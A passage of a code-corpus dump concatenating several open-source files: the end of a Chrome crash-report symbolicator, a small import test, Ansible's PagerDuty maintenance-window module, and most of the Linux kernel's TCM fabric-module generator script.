'look for dSYMs in ./symbols/15.0.666.0/ if the report is '
'from that version.')
(options, args) = parser.parse_args(args[1:])
# Check that we have something to symbolicate.
if len(args) != 2:
parser.print_usage()
return 1
report = CrashReport(args[1])
symbol_path = None
# If not using the standard layout, this is a full path to the symbols.
if not options.std_path:
symbol_path = args[0]
# Otherwise, use the report version to locate symbols in a directory.
else:
# This is in the format of |M.N.B.P (B.P)|. Get just the part before the
# space.
chrome_version = report.report_info['Version'].split(' ')[0]
symbol_path = os.path.join(args[0], chrome_version)
# Check that the symbols exist.
if not os.path.isdir(symbol_path):
print >>sys.stderr, 'Symbol path %s is not a directory' % symbol_path
return 2
print >>sys.stderr, 'Using symbols from ' + symbol_path
print >>sys.stderr, '=' * 80
report.Symbolicate(symbol_path)
PrettyPrintReport(report)
return 0
if __name__ == '__main__':
sys.exit(Main(sys.argv))
|
megan-guidry/dssr2017ABI-mgui210
|
refs/heads/master
|
modelVersions/testConnection.py
|
1
|
import sys
import os
sys.path.append(os.path.abspath("../"))
import InterfaceTest
print("IMPORT SUCCESS!")
#dataFile = InterfaceTest.dataFile
#print("Testoutput " + dataFile)
|
jhawkesworth/ansible
|
refs/heads/devel
|
lib/ansible/modules/monitoring/pagerduty.py
|
52
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
module: pagerduty
short_description: Create PagerDuty maintenance windows
description:
- This module will let you create PagerDuty maintenance windows.
version_added: "1.2"
author:
- "Andrew Newdigate (@suprememoocow)"
- "Dylan Silva (@thaumos)"
- "Justin Johns (!UNKNOWN)"
- "Bruce Pennypacker (@bpennypacker)"
requirements:
- PagerDuty API access
options:
state:
description:
- Create a maintenance window or get a list of ongoing windows.
required: true
choices: [ "running", "started", "ongoing", "absent" ]
name:
description:
- PagerDuty unique subdomain. Obsolete. It is not used with the PagerDuty REST v2 API.
user:
description:
- PagerDuty user ID. Obsolete. Please, use I(token) for authorization.
token:
description:
- A PagerDuty token, generated on the PagerDuty site. It is used for authorization.
required: true
version_added: '1.8'
requester_id:
description:
- ID of user making the request. Only needed when creating a maintenance_window.
version_added: '1.8'
service:
description:
- A comma separated list of PagerDuty service IDs.
aliases: [ services ]
window_id:
description:
- ID of the maintenance window. Only needed when deleting (state=absent) a maintenance window.
version_added: "2.7"
hours:
description:
- Length of maintenance window in hours.
default: 1
minutes:
description:
- Maintenance window in minutes (this is added to the hours).
default: 0
version_added: '1.8'
desc:
description:
- Short description of maintenance window.
default: Created by Ansible
validate_certs:
description:
- If C(no), SSL certificates will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
type: bool
default: 'yes'
version_added: 1.5.1
'''
EXAMPLES = '''
# List ongoing maintenance windows using a token
- pagerduty:
name: companyabc
token: xxxxxxxxxxxxxx
state: ongoing
# Create a 1 hour maintenance window for service FOO123
- pagerduty:
name: companyabc
user: example@example.com
token: yourtoken
state: running
service: FOO123
# Create a 5 minute maintenance window for service FOO123
- pagerduty:
name: companyabc
token: xxxxxxxxxxxxxx
hours: 0
minutes: 5
state: running
service: FOO123
# Create a 4 hour maintenance window for service FOO123 with the description "deployment".
- pagerduty:
name: companyabc
user: example@example.com
state: running
service: FOO123
hours: 4
desc: deployment
register: pd_window
# Delete the previous maintenance window
- pagerduty:
name: companyabc
user: example@example.com
state: absent
window_id: '{{ pd_window.result.maintenance_window.id }}'
# Delete a maintenance window from a separate playbook than the one that created it, assuming it is the only existing maintenance window.
- pagerduty:
requester_id: XXXXXXX
token: yourtoken
state: ongoing
register: pd_window
- pagerduty:
requester_id: XXXXXXX
token: yourtoken
state: absent
window_id: "{{ pd_window.result.maintenance_windows[0].id }}"
'''
import datetime
import json
import base64
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
from ansible.module_utils._text import to_bytes
class PagerDutyRequest(object):
def __init__(self, module, name, user, token):
self.module = module
self.name = name
self.user = user
self.token = token
self.headers = {
'Content-Type': 'application/json',
"Authorization": self._auth_header(),
'Accept': 'application/vnd.pagerduty+json;version=2'
}
def ongoing(self, http_call=fetch_url):
url = "https://api.pagerduty.com/maintenance_windows?filter=ongoing"
headers = dict(self.headers)
response, info = http_call(self.module, url, headers=headers)
if info['status'] != 200:
self.module.fail_json(msg="failed to lookup the ongoing window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, False
def create(self, requester_id, service, hours, minutes, desc, http_call=fetch_url):
if not requester_id:
self.module.fail_json(msg="requester_id is required when maintenance window should be created")
url = 'https://api.pagerduty.com/maintenance_windows'
headers = dict(self.headers)
headers.update({'From': requester_id})
start, end = self._compute_start_end_time(hours, minutes)
services = self._create_services_payload(service)
request_data = {'maintenance_window': {'start_time': start, 'end_time': end, 'description': desc, 'services': services}}
data = json.dumps(request_data)
response, info = http_call(self.module, url, data=data, headers=headers, method='POST')
if info['status'] != 201:
self.module.fail_json(msg="failed to create the window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, True
def _create_services_payload(self, service):
if (isinstance(service, list)):
return [{'id': s, 'type': 'service_reference'} for s in service]
else:
return [{'id': service, 'type': 'service_reference'}]
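# e.g. ['PXYZ123'] -> [{'id': 'PXYZ123', 'type': 'service_reference'}]
# (service ID is illustrative)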
def _compute_start_end_time(self, hours, minutes):
now = datetime.datetime.utcnow()
later = now + datetime.timedelta(hours=int(hours), minutes=int(minutes))
start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
end = later.strftime("%Y-%m-%dT%H:%M:%SZ")
return start, end
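# Illustrative return value for hours=1, minutes=5 (actual values depend on
# the current UTC time): ('2018-01-01T12:00:00Z', '2018-01-01T13:05:00Z')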
def absent(self, window_id, http_call=fetch_url):
url = "https://api.pagerduty.com/maintenance_windows/" + window_id
headers = dict(self.headers)
response, info = http_call(self.module, url, headers=headers, method='DELETE')
if info['status'] != 204:
self.module.fail_json(msg="failed to delete the window: %s" % info['msg'])
json_out = self._read_response(response)
return False, json_out, True
def _auth_header(self):
return "Token token=%s" % self.token
def _read_response(self, response):
try:
return json.loads(response.read())
except Exception:
return ""
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(required=True, choices=['running', 'started', 'ongoing', 'absent']),
name=dict(required=False),
user=dict(required=False),
token=dict(required=True, no_log=True),
service=dict(required=False, type='list', aliases=["services"]),
window_id=dict(required=False),
requester_id=dict(required=False),
hours=dict(default='1', required=False),
minutes=dict(default='0', required=False),
desc=dict(default='Created by Ansible', required=False),
validate_certs=dict(default='yes', type='bool'),
)
)
state = module.params['state']
name = module.params['name']
user = module.params['user']
service = module.params['service']
window_id = module.params['window_id']
hours = module.params['hours']
minutes = module.params['minutes']
token = module.params['token']
desc = module.params['desc']
requester_id = module.params['requester_id']
pd = PagerDutyRequest(module, name, user, token)
if state == "running" or state == "started":
if not service:
module.fail_json(msg="service not specified")
(rc, out, changed) = pd.create(requester_id, service, hours, minutes, desc)
if rc == 0:
changed = True
if state == "ongoing":
(rc, out, changed) = pd.ongoing()
if state == "absent":
(rc, out, changed) = pd.absent(window_id)
if rc != 0:
module.fail_json(msg="failed", result=out)
module.exit_json(msg="success", result=out, changed=changed)
if __name__ == '__main__':
main()
|
bhadram/linux
|
refs/heads/master
|
Documentation/target/tcm_mod_builder.py
|
337
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: nab@kernel.org
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var):
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi_proto.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "static const struct target_core_fabric_ops " + fabric_mod_name + "_ops;\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (kstrtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
if proto_ident == "FC":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_FCP);\n"
elif proto_ident == "SAS":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_SAS);\n"
elif proto_ident == "iSCSI":
buf += " ret = core_tpg_register(wwn, &tpg->se_tpg, SCSI_PROTOCOL_ISCSI);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static const struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .module = THIS_MODULE,\n"
buf += " .name = \"" + fabric_mod_name + "\",\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .sess_get_index = " + fabric_mod_name + "_sess_get_index,\n"
buf += " .sess_get_initiator_sid = NULL,\n"
buf += " .write_pending = " + fabric_mod_name + "_write_pending,\n"
buf += " .write_pending_status = " + fabric_mod_name + "_write_pending_status,\n"
buf += " .set_default_node_attributes = " + fabric_mod_name + "_set_default_node_attrs,\n"
buf += " .get_cmd_state = " + fabric_mod_name + "_get_cmd_state,\n"
buf += " .queue_data_in = " + fabric_mod_name + "_queue_data_in,\n"
buf += " .queue_status = " + fabric_mod_name + "_queue_status,\n"
buf += " .queue_tm_rsp = " + fabric_mod_name + "_queue_tm_rsp,\n"
buf += " .aborted_task = " + fabric_mod_name + "_aborted_task,\n"
buf += " /*\n"
buf += " * Setup function pointers for generic logic in target_core_fabric_configfs.c\n"
buf += " */\n"
buf += " .fabric_make_wwn = " + fabric_mod_name + "_make_" + fabric_mod_port + ",\n"
buf += " .fabric_drop_wwn = " + fabric_mod_name + "_drop_" + fabric_mod_port + ",\n"
buf += " .fabric_make_tpg = " + fabric_mod_name + "_make_tpg,\n"
buf += " .fabric_drop_tpg = " + fabric_mod_name + "_drop_tpg,\n"
buf += "\n"
buf += " .tfc_wwn_attrs = " + fabric_mod_name + "_wwn_attrs,\n"
buf += "};\n\n"
buf += "static int __init " + fabric_mod_name + "_init(void)\n"
buf += "{\n"
buf += " return target_register_template(&" + fabric_mod_name + "_ops);\n"
buf += "};\n\n"
buf += "static void __exit " + fabric_mod_name + "_exit(void)\n"
buf += "{\n"
buf += " target_unregister_template(&" + fabric_mod_name + "_ops);\n"
buf += "};\n\n"
buf += "MODULE_DESCRIPTION(\"" + fabric_mod_name.upper() + " series fabric driver\");\n"
buf += "MODULE_LICENSE(\"GPL\");\n"
buf += "module_init(" + fabric_mod_name + "_init);\n"
buf += "module_exit(" + fabric_mod_name + "_exit);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_scan_fabric_ops(tcm_dir):
fabric_ops_api = tcm_dir + "include/target/target_core_fabric.h"
print "Using tcm_mod_scan_fabric_ops: " + fabric_ops_api
process_fo = 0;
p = open(fabric_ops_api, 'r')
line = p.readline()
while line:
if process_fo == 0 and re.search('struct target_core_fabric_ops {', line):
line = p.readline()
continue
if process_fo == 0:
process_fo = 1;
line = p.readline()
continue
# Search for function pointer declarations and collect them.
if re.search('\(\*', line):
fabric_ops.append(line.rstrip())
line = p.readline()
p.close()
return
def tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
bufi = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.c"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
fi = fabric_mod_dir_var + "/" + fabric_mod_name + "_fabric.h"
print "Writing file: " + fi
pi = open(fi, 'w')
if not pi:
tcm_mod_err("Unable to open file: " + fi)
buf = "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/list.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n"
buf += "#include <scsi/scsi_common.h>\n"
buf += "#include <scsi/scsi_proto.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "int " + fabric_mod_name + "_check_true(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_true(struct se_portal_group *);\n"
buf += "int " + fabric_mod_name + "_check_false(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_check_false(struct se_portal_group *);\n"
for fo in fabric_ops:
# print "fabric_ops: " + fo
if re.search('get_fabric_name', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_name(void)\n"
buf += "{\n"
buf += " return \"" + fabric_mod_name + "\";\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_name(void);\n"
continue
if re.search('get_wwn', fo):
buf += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_name[0];\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_get_fabric_wwn(struct se_portal_group *);\n"
if re.search('get_tag', fo):
buf += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " return tpg->" + fabric_mod_port + "_tpgt;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_tag(struct se_portal_group *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "void " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('aborted_task\)\(', fo):
buf += "void " + fabric_mod_name + "_aborted_task(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_aborted_task(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
